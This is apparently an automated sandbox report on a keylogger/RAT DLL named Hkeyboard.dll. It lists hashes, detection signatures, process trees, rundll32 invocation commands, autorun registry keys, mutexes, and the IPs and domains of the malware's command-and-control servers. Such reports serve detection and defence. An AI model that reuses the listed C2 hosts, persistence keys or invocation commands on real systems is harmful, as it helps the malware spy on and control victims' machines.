Edit tour

Windows Analysis Report
Hkeyboard.dll

Overview

General Information

Sample name:	Hkeyboard.dll
Analysis ID:	1578296
MD5:	74180139ac5989392ea788036116a937
SHA1:	703f9052ef90dd93ee0b4e84dd48c131b423208b
SHA256:	6fd79201ed86080b03d8bd1ea1b8251eef8c86b242cf1406b6cad9d84b9cd0d9
Tags:	de-pumpeddllexeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Allocates memory in foreign processes

Contains functionality to inject code into remote processes

Creates an autostart registry key pointing to binary in C:\Windows

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Sigma detected: Dllhost.EXE Execution Anomaly

Tries to access browser extension known for cryptocurrency wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to create an SMB header

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dllhost Internet Connection

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3428 cmdline: loaddll32.exe "C:\Users\user\Desktop\Hkeyboard.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6872 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 2536 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 5632 cmdline: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)

dllhost.exe (PID: 7220 cmdline: dllhost.exe MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)

rundll32.exe (PID: 7184 cmdline: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7276 cmdline: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7352 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7360 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7368 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7300 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7568 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Sigma Signatures

System Summary

Sigma detected: Dllhost.EXE Execution Anomaly

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: dllhost.exe, CommandLine: dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\dllhost.exe, NewProcessName: C:\Windows\SysWOW64\dllhost.exe, OriginalFileName: C:\Windows\SysWOW64\dllhost.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5632, ParentProcessName: rundll32.exe, ProcessCommandLine: dllhost.exe, ProcessId: 7220, ProcessName: dllhost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\SysWOW64\rundll32.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\proxifer.update

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 103.252.117.185, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\dllhost.exe, Initiated: true, ProcessId: 7220, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49742

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\SysWOW64\rundll32.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5632, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rolyer.update

Suricata Signatures

ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T14:48:19.112652+0100	2049151	1	A Network Trojan was detected	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:49:04.243762+0100	2049151	1	A Network Trojan was detected	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:49:49.156685+0100	2049151	1	A Network Trojan was detected	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:50:34.179212+0100	2049151	1	A Network Trojan was detected	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:51:19.204984+0100	2049151	1	A Network Trojan was detected	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:52:04.301629+0100	2049151	1	A Network Trojan was detected	81.31.208.36	8081	192.168.2.6	49736	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.0% probability

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01E506 CertOpenStore,GetLastError,CryptStringToBinaryA,CertCloseStore,CertFindCertificateInStore,CertCloseStore,__fread_nolock,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,CertFreeCertificateContext,CertCloseStore,_strncpy,CertFreeCertificateContext,	3_2_6D01E506
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D045D40 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	3_2_6D045D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D048900 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_6D048900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D044970 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	3_2_6D044970
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0449C0 CryptHashData,	3_2_6D0449C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0449E0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_6D0449E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D03F9F0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	3_2_6D03F9F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01C8D0 BCryptGenRandom,	3_2_6D01C8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D03F520 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	3_2_6D03F520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01D4B0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_6D01D4B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01C750 BCryptGenRandom,	3_2_6D01C750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01C690 BCryptGenRandom,	3_2_6D01C690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D047130 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_6D047130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D047190 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_6D047190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0470F0 CryptAcquireContextA,CryptCreateHash,	3_2_6D0470F0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: -----BEGIN PUBLIC KEY-----		3_2_6D003340
Source: rundll32.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: mov dword ptr [ebx+04h], 424D53FFh

3_2_6D02C120

Source: Hkeyboard.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49726 version: TLS 1.2

Source: Hkeyboard.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\Users\Administrator\source\repos\sn-15\Release\sn-15.pdb source: rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6D0668DA FindFirstFileExW,

3_2_6D0668DA

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2049151 - Severity 1 - ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement : 81.31.208.36:8081 -> 192.168.2.6:49736

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 104.21.40.214 443			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 81.31.208.36 8081			Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.6:49736 -> 81.31.208.36:8081

Source: global traffic	HTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: /
Source: global traffic	HTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: /

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: PERMANETASIE PERMANETASIE

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC79E0 select,_memset,recv,setsockopt,CancelIo,InterlockedExchange,closesocket,setsockopt,CancelIo,InterlockedExchange,closesocket,SetEvent,

3_2_04EC79E0

Source: global traffic	HTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: /
Source: global traffic	HTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: /

Source: global traffic	DNS traffic detected: DNS query: www.dj5a2sbj.icu
Source: global traffic	DNS traffic detected: DNS query: api.mods4ws.me

Source: rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	String found in binary or memory: https://curl.se/docs/hsts.html
Source: rundll32.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: rundll32.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2239587139.000000000302A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	String found in binary or memory: https://www.dj5a2sbj.icu/yj/update.xml
Source: rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	String found in binary or memory: https://www.dj5a2sbj.icu/yj/update.xmlVirtualProtectVirtualAllocwinosX
Source: rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dj5a2sbj.icu/yj/update.xmlsecur32.dll

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	HTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49726 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC60A0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_04EC60A0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC6B00 GetTickCount,_memset,CloseHandle,_memset,wsprintfA,ShellExecuteA,ShellExecuteA,Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	3_2_04EC6B00
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A67F0 GetTickCount,_memset,CloseHandle,_memset,wsprintfA,ShellExecuteA,ShellExecuteA,Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	8_2_032A67F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04176B00 GetTickCount,_memset,CloseHandle,_memset,wsprintfA,ShellExecuteA,ShellExecuteA,Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	11_2_04176B00

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC60A0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_04EC60A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6D045D40 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,

3_2_6D045D40

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC5930 ExitWindowsEx,	3_2_04EC5930
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A5620 ExitWindowsEx,	8_2_032A5620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04175930 ExitWindowsEx,	11_2_04175930

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EB34F0	3_2_04EB34F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EBA5DE	3_2_04EBA5DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04ED8D56	3_2_04ED8D56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EDF659	3_2_04EDF659
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EBFE3F	3_2_04EBFE3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC1E0E	3_2_04EC1E0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC0FBD	3_2_04EC0FBD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC08E1	3_2_04EC08E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04ED2998	3_2_04ED2998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EDF108	3_2_04EDF108
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EE0286	3_2_04EE0286
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EE1217	3_2_04EE1217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EDFBAA	3_2_04EDFBAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC0390	3_2_04EC0390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EC6B00	3_2_04EC6B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6CFFBFE0	3_2_6CFFBFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01E506	3_2_6D01E506
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D018710	3_2_6D018710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D041D00	3_2_6D041D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D017D10	3_2_6D017D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D006D30	3_2_6D006D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D03FC00	3_2_6D03FC00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D06AC46	3_2_6D06AC46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D031CB0	3_2_6D031CB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D037CC0	3_2_6D037CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0488B0	3_2_6D0488B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D013BC0	3_2_6D013BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D04AAC0	3_2_6D04AAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D02FAF0	3_2_6D02FAF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01B590	3_2_6D01B590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D05D7A6	3_2_6D05D7A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0527B7	3_2_6D0527B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0547F0	3_2_6D0547F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01D640	3_2_6D01D640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D068688	3_2_6D068688
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D028100	3_2_6D028100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D04915C	3_2_6D04915C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D02A1B0	3_2_6D02A1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D04F0E1	3_2_6D04F0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D020360	3_2_6D020360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D042260	3_2_6D042260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D048280	3_2_6D048280
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_0329FB50	8_2_0329FB50
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_0329979E	8_2_0329979E
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032933E0	8_2_032933E0
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A67F0	8_2_032A67F0
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A05F2	8_2_032A05F2
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A1C5F	8_2_032A1C5F
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A00A1	8_2_032A00A1
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032A0CCE	8_2_032A0CCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_041634F0	11_2_041634F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04188D56	11_2_04188D56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0416A5DE	11_2_0416A5DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04171E0E	11_2_04171E0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0416FE3F	11_2_0416FE3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0418F659	11_2_0418F659
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04170FBD	11_2_04170FBD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_041708E1	11_2_041708E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0418F108	11_2_0418F108
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04182998	11_2_04182998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04191217	11_2_04191217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04190286	11_2_04190286
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04176B00	11_2_04176B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04170390	11_2_04170390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0418FBAA	11_2_0418FBAA

Source: C:\Windows\SysWOW64\dllhost.exe	Code function: String function: 03295A00 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04184FB8 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04EB5CE0 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04ED4FB8 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D049D00 appears 65 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D018DE0 appears 59 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D043550 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D00E490 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D00A450 appears 290 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D00A380 appears 389 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D00DDB0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04165CE0 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D00DE10 appears 51 times

Source: Hkeyboard.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal100.spyw.evad.winDLL@23/1@2/4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC34F0 CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,lstrcmpiA,Process32Next,CloseHandle,

3_2_04EC34F0

Source: C:\Windows\SysWOW64\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MaticYoyox
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\xYYAgXEhxx
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03

Source: Hkeyboard.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Hkeyboard.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ
